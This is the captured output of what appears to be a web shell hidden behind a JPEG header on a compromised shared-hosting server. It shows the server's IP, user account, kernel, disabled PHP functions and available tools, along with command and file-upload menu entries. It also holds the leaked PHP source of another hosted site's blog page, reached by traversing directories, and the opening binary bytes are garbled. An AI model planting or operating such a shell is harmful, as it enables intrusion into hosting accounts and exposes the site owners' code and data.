����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.143.4.178 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/.well-known/../../highlandbnd.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $page = 'blog'; include 'header.php'; include 'admin/db.php'; ?> <style> body{ background-size:cover; } </style> <!-- BREADCRUMB STARTS HERE --> <div class="rv-breadcrumb pt-120 pb-120"> <div class="container"> <h1 class="rv-breadcrumb__title">News & Blog</h1> <ul class="rv-breadcrumb__nav d-flex justify-content-center"> <li><a href="index.php"><i class="fa-solid fa-sharp fa-home"></i> Home</a></li> <li class="current-page"><span class="dvdr"> /</span><span>Blog Masonry</span></li> </ul> </div> </div> <!-- BREADCRUMB ENDS HERE --> <!-- BLOG SECTION STARTS HERE ↓ --> <section class="rv-inner-blogs rv-section-spacing"> <div class="container"> <div class="rv-inner-blogs__row"> <?php $sql = "SELECT * FROM web_blog ORDER BY id DESC LIMIT 3"; $result = $conn->query($sql); if ($result->num_rows > 0) { while ($row = $result->fetch_assoc()) { ?> <div class="rv-1-blog rv-inner-blog" style=""> <div class="rv-1-blog__img"> <img src="admin/<?= htmlspecialchars($row['image1']); ?>" alt="Blog Image"> </div> <div class="rv-1-blog__txt"> <ul class="rv-1-blog__infos"> <li><img src="assets/img/rv-1-icon-4.png" alt="icon"><?= $row['date']; ?></li> </ul> <h4 class="rv-1-blog__title"><a href="blogs.php?id=<?= $row['id']; ?>"><?= htmlspecialchars($row['heading']); ?></a></h4> <a href="blogs.php?id=<?= $row['id']; ?>" class="rv-1-schedule-conf__btn rv-1-blog__btn">Read More <i class="fa-light fa-arrow-right"></i></a> </div> </div> <?php }}?> </div> </div> </section> <!-- BLOG SECTION ENDS HERE ↑ --> <?php include 'footer.php'; ?>